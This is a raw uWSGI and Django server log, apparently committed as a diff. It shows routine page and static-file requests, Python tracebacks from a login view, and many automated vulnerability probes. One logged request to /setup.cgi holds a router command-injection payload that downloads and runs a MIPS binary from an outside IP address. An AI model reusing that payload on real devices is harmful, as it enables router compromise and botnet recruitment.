"/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 18965|app: 0|req: 354/477] 180.163.220.4 () {38 vars in 845 bytes} [Fri Jan 8 17:18:33 2021] GET /home/ => generated 57880 bytes in 32 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 0) +[pid: 18965|app: -1|req: -1/478] 27.115.124.38 () {40 vars in 961 bytes} [Fri Jan 8 17:18:38 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/479] 27.115.124.101 () {40 vars in 968 bytes} [Fri Jan 8 17:18:38 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/480] 27.115.124.6 () {28 vars in 446 bytes} [Fri Jan 8 17:18:41 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/481] 27.115.124.101 () {28 vars in 448 bytes} [Fri Jan 8 17:18:44 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 355/482] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 17:21:01 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 356/483] 119.45.190.53 () {22 vars in 234 bytes} [Fri Jan 8 17:24:42 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.0 301) 5 headers in 175 bytes (1 switches on core 1) +Not Found: /manager/html/ +[pid: 18965|app: 0|req: 357/484] 119.45.190.53 () {24 vars in 302 bytes} [Fri Jan 8 17:24:42 2021] GET /manager/html/ => generated 3404 bytes in 3 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 358/485] 83.97.20.21 () {26 vars in 277 bytes} [Fri Jan 8 18:04:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 359/486] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 18:49:09 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 360/487] 83.97.20.21 () {22 vars in 227 bytes} [Fri Jan 8 18:49:35 2021] OPTIONS / => generated 52541 bytes in 21 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 1) +Internal Server Error: / +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 188, in _get_response + self.check_response(response, callback) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 311, in check_response + "instead." % name +ValueError: The view app01.views.login didn't return an HttpResponse object. It returned None instead. +[pid: 18965|app: 0|req: 361/488] 83.97.20.21 () {22 vars in 224 bytes} [Fri Jan 8 18:49:45 2021] HEAD / => generated 52526 bytes in 22 msecs (HTTP/1.0 500) 6 headers in 186 bytes (1 switches on core 0) +[uwsgi-http key: VM-0-13-centos client_addr: 83.97.20.21 client_port: 20850] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 18965|app: 0|req: 362/489] 139.162.79.87 () {30 vars in 337 bytes} [Fri Jan 8 19:15:37 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 363/490] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 19:33:24 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 364/491] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 20:17:51 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /goform/setUsbUnload/ +[pid: 18965|app: 0|req: 365/492] 205.185.116.160 () {44 vars in 760 bytes} [Fri Jan 8 20:18:28 2021] POST /goform/setUsbUnload/ => generated 3418 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 366/493] 116.233.88.102 () {26 vars in 289 bytes} [Fri Jan 8 20:29:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 367/494] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 21:00:19 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /tmUnblock.cgi +[pid: 18965|app: 0|req: 368/495] 181.143.101.194 () {36 vars in 463 bytes} [Fri Jan 8 21:13:38 2021] POST /tmUnblock.cgi => generated 3400 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 369/496] 83.97.20.34 () {26 vars in 277 bytes} [Fri Jan 8 21:25:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /Telerik.Web.UI.WebResource.axd +[pid: 18965|app: 0|req: 370/497] 193.118.53.194 () {30 vars in 515 bytes} [Fri Jan 8 21:53:29 2021] GET /Telerik.Web.UI.WebResource.axd?type=rau => generated 3463 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /http:/example.com/ +[pid: 18965|app: 0|req: 371/498] 64.31.8.10 () {28 vars in 346 bytes} [Fri Jan 8 21:55:02 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 4823] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 372/499] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 21:55:02 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /http:/110.242.68.4/ +[pid: 18965|app: 0|req: 373/500] 112.193.169.8 () {40 vars in 809 bytes} [Fri Jan 8 21:55:03 2021] HEAD http://110.242.68.4/ => generated 1670 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 374/501] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:16:47 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 65240] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +Not Found: /http:/example.com/ +[pid: 18965|app: 0|req: 375/502] 64.31.8.10 () {28 vars in 347 bytes} [Fri Jan 8 22:20:13 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 376/503] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:20:13 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 377/504] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 22:23:44 2021] GET / => generated 6416 bytes in 2 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 378/505] 65.60.11.210 () {30 vars in 436 bytes} [Fri Jan 8 22:28:38 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /http:/example.com/ +[pid: 18965|app: 0|req: 379/506] 64.31.8.10 () {28 vars in 347 bytes} [Fri Jan 8 22:51:09 2021] GET http://example.com/ => generated 1665 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[uwsgi-http key: example.com client_addr: 64.31.8.10 client_port: 61568] hr_read(): Connection reset by peer [plugins/http/http.c line 917] +Not Found: /dnspod.qcloud.com:443 +[pid: 18965|app: 0|req: 380/507] 64.31.8.10 () {26 vars in 337 bytes} [Fri Jan 8 22:51:10 2021] CONNECT dnspod.qcloud.com:443 => generated 1686 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 381/508] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 23:00:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 382/509] 180.160.69.32 () {36 vars in 654 bytes} [Fri Jan 8 23:05:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/510] 180.160.69.32 () {38 vars in 775 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/511] 180.160.69.32 () {38 vars in 753 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/512] 180.160.69.32 () {38 vars in 755 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/513] 180.160.69.32 () {38 vars in 757 bytes} [Fri Jan 8 23:05:39 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/514] 180.160.69.32 () {38 vars in 734 bytes} [Fri Jan 8 23:05:39 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/515] 180.160.69.32 () {38 vars in 736 bytes} [Fri Jan 8 23:05:39 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 2 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/516] 180.160.69.32 () {38 vars in 752 bytes} [Fri Jan 8 23:05:40 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/517] 180.160.69.32 () {38 vars in 742 bytes} [Fri Jan 8 23:05:41 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/518] 180.160.69.32 () {38 vars in 761 bytes} [Fri Jan 8 23:05:41 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/519] 180.160.69.32 () {38 vars in 750 bytes} [Fri Jan 8 23:05:41 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/520] 180.160.69.32 () {38 vars in 807 bytes} [Fri Jan 8 23:05:43 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 383/521] 113.96.232.119 () {32 vars in 486 bytes} [Fri Jan 8 23:11:16 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 384/522] 83.97.20.29 () {26 vars in 278 bytes} [Fri Jan 8 23:22:10 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 385/523] 212.64.18.182 () {28 vars in 321 bytes} [Fri Jan 8 23:38:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 386/524] 189.0.37.25 () {28 vars in 401 bytes} [Fri Jan 8 23:41:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 387/525] 83.97.20.21 () {26 vars in 278 bytes} [Fri Jan 8 23:42:55 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /setup.cgi +[pid: 18965|app: 0|req: 388/526] 178.153.110.59 () {28 vars in 818 bytes} [Sat Jan 9 00:02:05 2021] GET /setup.cgi?next_file=afr.cfg&todo=syscmd&cmd=wget%20http://185.248.102.144/bins/Packets.mips%20-O%20/var/tmp/Packets.mips;%20chmod%20777%20/var/tmp/Packets.mips;%20/var/tmp/Packets.mips => generated 3575 bytes in 4 msecs (NetgearRep;%20rm%20-rf%20/var/tmp/Packets.mips&curpath=/¤tsetting.htm=1 HTTP/1.1 404) 5 headers in 237 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 389/527] 83.97.20.34 () {26 vars in 278 bytes} [Sat Jan 9 00:11:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 390/528] 114.87.230.234 () {38 vars in 929 bytes} [Sat Jan 9 00:18:21 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/529] 114.87.230.234 () {40 vars in 973 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/530] 114.87.230.234 () {40 vars in 951 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/531] 114.87.230.234 () {40 vars in 955 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/532] 114.87.230.234 () {40 vars in 953 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/533] 114.87.230.234 () {40 vars in 959 bytes} [Sat Jan 9 00:18:21 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/534] 114.87.230.234 () {40 vars in 934 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/535] 114.87.230.234 () {40 vars in 932 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/536] 114.87.230.234 () {40 vars in 950 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/537] 114.87.230.234 () {40 vars in 948 bytes} [Sat Jan 9 00:18:21 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 12639] hr_write(): Connection reset by peer [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 21343] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 56158] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 212.64.67.134:8080 client_addr: 114.87.230.234 client_port: 22111] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 18965|app: 0|req: 391/538] 114.87.230.234 () {40 vars in 1018 bytes} [Sat Jan 9 00:18:26 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/539] 114.87.230.234 () {40 vars in 951 bytes} [Sat Jan 9 00:18:26 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/540] 114.87.230.234 () {40 vars in 959 bytes} [Sat Jan 9 00:18:26 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/541] 114.87.230.234 () {40 vars in 932 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/542] 114.87.230.234 () {40 vars in 948 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/543] 114.87.230.234 () {40 vars in 940 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/544] 114.87.230.234 () {40 vars in 934 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/545] 114.87.230.234 () {40 vars in 950 bytes} [Sat Jan 9 00:18:26 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/546] 114.87.230.234 () {40 vars in 1044 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/547] 114.87.230.234 () {40 vars in 1050 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/548] 114.87.230.234 () {40 vars in 1012 bytes} [Sat Jan 9 00:18:28 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 18965|app: 0|req: 392/549] 219.228.146.31 () {38 vars in 917 bytes} [Sat Jan 9 00:19:14 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/550] 219.228.146.31 () {40 vars in 961 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/551] 219.228.146.31 () {40 vars in 963 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/552] 219.228.146.31 () {40 vars in 983 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/553] 219.228.146.31 () {40 vars in 965 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/554] 219.228.146.31 () {40 vars in 969 bytes} [Sat Jan 9 00:19:14 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/555] 219.228.146.31 () {40 vars in 944 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/556] 219.228.146.31 () {40 vars in 942 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/557] 219.228.146.31 () {40 vars in 960 bytes} [Sat Jan 9 00:19:14 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 393/558] 219.228.146.31 () {40 vars in 1006 bytes} [Sat Jan 9 00:19:17 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/559] 219.228.146.31 () {40 vars in 961 bytes} [Sat Jan 9 00:19:17 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/560] 219.228.146.31 () {40 vars in 969 bytes} [Sat Jan 9 00:19:17 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/561] 219.228.146.31 () {40 vars in 942 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 18965|app: -1|req: -1/562] 219.228.146.31 () {40 vars in 960 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/563] 219.228.146.31 () {40 vars in 958 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/564] 219.228.146.31 () {40 vars in 950 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/565] 219.228.146.31 () {40 vars in 944 bytes} [Sat Jan 9 00:19:17 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[uwsgi-http key: 212.64.67.134:8080 client_addr: 219.228.146.31 client_port: 56506] hr_write(): Connection reset by peer [plugins/http/http.c line 565] +[pid: 18965|app: 0|req: 394/566] 101.91.60.107 () {32 vars in 626 bytes} [Sat Jan 9 00:20:41 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/567] 101.91.60.107 () {34 vars in 691 bytes} [Sat Jan 9 00:21:01 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 395/568] 61.129.6.251 () {32 vars in 538 bytes} [Sat Jan 9 00:21:35 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/569] 61.129.6.251 () {34 vars in 625 bytes} [Sat Jan 9 00:21:55 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/570] 101.91.60.107 () {34 vars in 670 bytes} [Sat Jan 9 00:22:12 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 396/571] 83.97.20.21 () {26 vars in 278 bytes} [Sat Jan 9 00:22:39 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.0 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: -1|req: -1/572] 101.91.60.107 () {34 vars in 713 bytes} [Sat Jan 9 00:23:03 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/573] 61.129.6.251 () {34 vars in 694 bytes} [Sat Jan 9 00:23:06 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/574] 101.91.60.107 () {34 vars in 685 bytes} [Sat Jan 9 00:23:43 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/575] 61.129.6.251 () {34 vars in 686 bytes} [Sat Jan 9 00:23:56 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/576] 101.91.60.107 () {34 vars in 633 bytes} [Sat Jan 9 00:24:24 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/577] 61.129.6.251 () {34 vars in 727 bytes} [Sat Jan 9 00:24:37 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 18965|app: -1|req: -1/578] 61.129.6.251 () {34 vars in 720 bytes} [Sat Jan 9 00:25:17 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 18965|app: 0|req: 397/579] 180.160.69.32 () {38 vars in 743 bytes} [Sat Jan 9 00:26:34 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 18965|app: 0|req: 398/580] 180.160.69.32 () {38 vars in 743 bytes} [Sat Jan 9 00:26:36 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 